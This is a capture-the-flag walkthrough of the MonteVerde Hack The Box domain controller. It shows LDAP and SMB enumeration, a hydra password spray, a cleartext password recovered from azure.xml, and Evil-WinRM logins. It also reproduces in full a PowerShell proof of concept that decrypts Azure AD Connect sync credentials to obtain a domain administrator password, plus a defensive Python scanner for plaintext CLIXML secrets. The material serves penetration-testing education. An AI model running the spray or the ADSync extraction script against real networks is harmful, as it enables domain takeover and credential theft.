MonteVerde.htb

This is a detailed walk-through for monteverde.htb, written by dR1PPy.

One of those rare boxes where I was able to get both the User and Root flags quickly.
While there are tons of services open, this is a standard Windows Domain Controller type of takedown.

Overall this was a great host for emulating what is commonly seen on real-world Windows networks in many companies today.

Enumeration

As always we start with a port scan and basic enumeration steps.

Services
========

host          port   proto  name          state  info
----          ----   -----  ----          -----  ----
10.10.10.172  53     tcp    domain        open   
10.10.10.172  88     tcp    kerberos-sec  open   Microsoft Windows Kerberos server time: 2020-01-15 02:04:03Z
10.10.10.172  135    tcp    msrpc         open   Microsoft Windows RPC
10.10.10.172  139    tcp    netbios-ssn   open   Microsoft Windows netbios-ssn
10.10.10.172  389    tcp    ldap          open   Microsoft Windows Active Directory LDAP Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name
10.10.10.172  445    tcp    microsoft-ds  open   
10.10.10.172  464    tcp    kpasswd5      open   
10.10.10.172  593    tcp    ncacn_http    open   Microsoft Windows RPC over HTTP 1.0
10.10.10.172  636    tcp    tcpwrapped    open   
10.10.10.172  3268   tcp    ldap          open   Microsoft Windows Active Directory LDAP Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name
10.10.10.172  3269   tcp    tcpwrapped    open   
10.10.10.172  5985   tcp    http          open   Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
10.10.10.172  9389   tcp    mc-nmf        open   .NET Message Framing
10.10.10.172  49667  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.172  49669  tcp    ncacn_http    open   Microsoft Windows RPC over HTTP 1.0
10.10.10.172  49670  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.172  49673  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.172  49702  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.172  49771  tcp    msrpc         open   Microsoft Windows RPC

During our SMB Enumeration we find some interesting items.

########## Enumerating domains ##########

name:[MEGABANK] idx:[0x0]
name:[Builtin] idx:[0x0]


########## Enumerating users ##########

user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]

So it looks like we are dealing with a domain; maybe we can query the LDAP service for more information?
We can use the windapsearch tool to help extract all the domain info.

python windapsearch.py -d MEGABANK --dc-ip 10.10.10.172 -U --full -G -C
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.172
[+] Getting defaultNamingContext from Root DSE
[+]    Found: DC=MEGABANK,DC=LOCAL
[+] Attempting bind
[+]    ...success! Binded as: 
[+]     None

[+] Enumerating all AD groups
[+]    Found 48 groups: 

...

[+] Enumerating all AD users
[+]    Found 10 users: 

...

[+] Enumerating all AD computers
[+]    Found 1 computers: 

...

[*] Bye!

Gaining User Access

We use the complete output to build a good list of domain users for some simple brute-force attacks.

grep "sAMAccountName" windapsearch.txt | awk '{print $2}' > usernames.txt

We start a brute-force attack to find weak passwords. Using standard password lists produces false positives: hydra reports a successful NULL-password login for every account, which is just the LDAP server accepting an anonymous bind.
To validate this we modify our hydra command a bit, trying only the null password, the username as the password, and the reversed username (-e nsr):

hydra -L usernames.txt ldap2://10.10.10.172 -e nsr

This attack gives us a valid username and password pair:

[389][ldap2] host: 10.10.10.172   login: SABatchJobs   password: SABatchJobs

Now it's just a matter of moving through the resources available.
We find we can use this login to access the shared folders.
The most interesting share is the users$ folder.

smbclient -L 10.10.10.172 -U SABatchJobs
Unable to initialize messaging context
Enter WORKGROUP\SABatchJobs's password: 

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    azure_uploads   Disk      
    C$              Disk      Default share
    E$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    SYSVOL          Disk      Logon server share 
    users$          Disk      

We access this share and find one file of interest.

smbclient "\\\\10.10.10.172\\users$" -U SABatchJobs 
Unable to initialize messaging context
Enter WORKGROUP\SABatchJobs's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Jan  3 06:12:48 2020
  ..                                  D        0  Fri Jan  3 06:12:48 2020
  dgalanos                            D        0  Fri Jan  3 06:12:30 2020
  mhope                               D        0  Fri Jan  3 06:41:18 2020
  roleary                             D        0  Fri Jan  3 06:10:30 2020
  smorgan                             D        0  Fri Jan  3 06:10:24 2020

        524031 blocks of size 4096. 519955 blocks available
smb: \> cd mhope
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (5.4 KiloBytes/sec) (average 5.4 KiloBytes/sec)

We look through the file and find another password.

cat azure.xml 
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
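The file above is PowerShell CLIXML (the Export-Clixml format). Export-Clixml writes ordinary System.String properties in the clear as <S> elements and only DPAPI-protects SecureString values, which appear as <SS>, so a plain string property named Password is a cleartext credential sitting on a file share. The following scanner is an added example, not code from the write-up or from any tool it mentions: it walks the objects in a CLIXML document and reports secret-looking properties together with whether they are plaintext or DPAPI-wrapped. The property-name list and the second sample object are assumptions constructed for the demo.

```python
import xml.etree.ElementTree as ET

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
NS = {"ps": PS_NS}
# Property names worth flagging (assumption: a starter list, extend as needed)
SECRET_PROPS = {"password", "secret", "clientsecret", "apikey", "token"}

def find_clixml_secrets(xml_text):
    """Return (object_type, property, state) for each secret-looking property.
    state is 'PLAINTEXT' for <S> (System.String) and 'DPAPI' for <SS> (SecureString)."""
    root = ET.fromstring(xml_text.lstrip("\ufeff"))  # drop the BOM PowerShell writes
    findings = []
    for obj in root.iter("{%s}Obj" % PS_NS):
        tn = obj.find("ps:TN/ps:T", NS)  # first <T> is the most-derived .NET type
        obj_type = tn.text if tn is not None else "<unknown>"
        for prop in obj.findall("ps:Props/*", NS):
            name = prop.get("N", "")
            if name.lower() not in SECRET_PROPS:
                continue
            tag = prop.tag.split("}")[-1]  # strip the namespace from the element name
            if tag == "S":
                findings.append((obj_type, name, "PLAINTEXT"))
            elif tag == "SS":
                findings.append((obj_type, name, "DPAPI"))
    return findings

# Constructed sample: object 0 mirrors the azure.xml found in the users$ share,
# object 1 is a PSCredential exported with Export-Clixml, whose SecureString
# password is DPAPI-wrapped (<SS>); the blob and account name are made up.
SAMPLE = """\ufeff<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0"><T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T><T>System.Object</T></TN>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
  <Obj RefId="1">
    <TN RefId="1"><T>System.Management.Automation.PSCredential</T><T>System.Object</T></TN>
    <Props>
      <S N="UserName">MEGABANK\\svc-example</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb-CONSTRUCTED-BLOB</SS>
    </Props>
  </Obj>
</Objs>"""

if __name__ == "__main__":
    for obj_type, prop, state in find_clixml_secrets(SAMPLE):
        print(f"{state:9} {obj_type}.{prop}")
```

Run over a mounted share (for example with a loop over *.xml files), the PLAINTEXT hits are the ones to rotate first; DPAPI hits are only usable by the user and machine that exported them.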

We assume this password belongs to mhope since we found this in his user folder.
We fire up some Evil-WinRM to validate this.

evil-winrm -i 10.10.10.172 -u mhope -p 4n0therD4y@n0th3r$

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents>

From here we can quickly grab the User token from the Desktop.

Privilege Escalation

During standard enumeration, one of the items we noted was the large number of services, users, groups, and resources set up for Azure.
So we spend some more time enumerating this and find a possible attack vector.

From the following article we find we may be able to extract AD credentials from the Azure AD Connect sync service:

https://blog.xpnsec.com/azuread-connect-for-redteam/

We take the POC code from the article and make some minor modifications so that it calls the proper object type.

Write-Host "AD Connect Sync Credential Extract POC (@_xpn_)`n"

# Connect to the local ADSync database and read the key set identifiers
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
$client.ConnectionString="trusted_connection=true;"
$client.open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM ADSync.dbo.mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

# Read the AD management agent's configuration XML and encrypted credential blob
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM ADSync.dbo.mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

# Load the AD Sync crypto library, load the key set and decrypt the blob
add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

# Pull the domain and username from the configuration XML and the password from the decrypted XML
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerXML}}

Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)

We copy this over to our target and run it to extract some credentials.

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File ad_sync_extract.ps1
AD Connect Sync Credential Extract POC (@_xpn_)

Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!

With these domain administrator credentials we log in again with Evil-WinRM to grab the Root flag.

evil-winrm -i 10.10.10.172 -u administrator -p d0m@in4dminyeah!

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>

Resources:

Python Script to Enumerate Objects from an AD LDAP service
https://github.com/ropnop/windapsearch

Azure AD Connect for Red Teams
https://blog.xpnsec.com/azuread-connect-for-redteam/
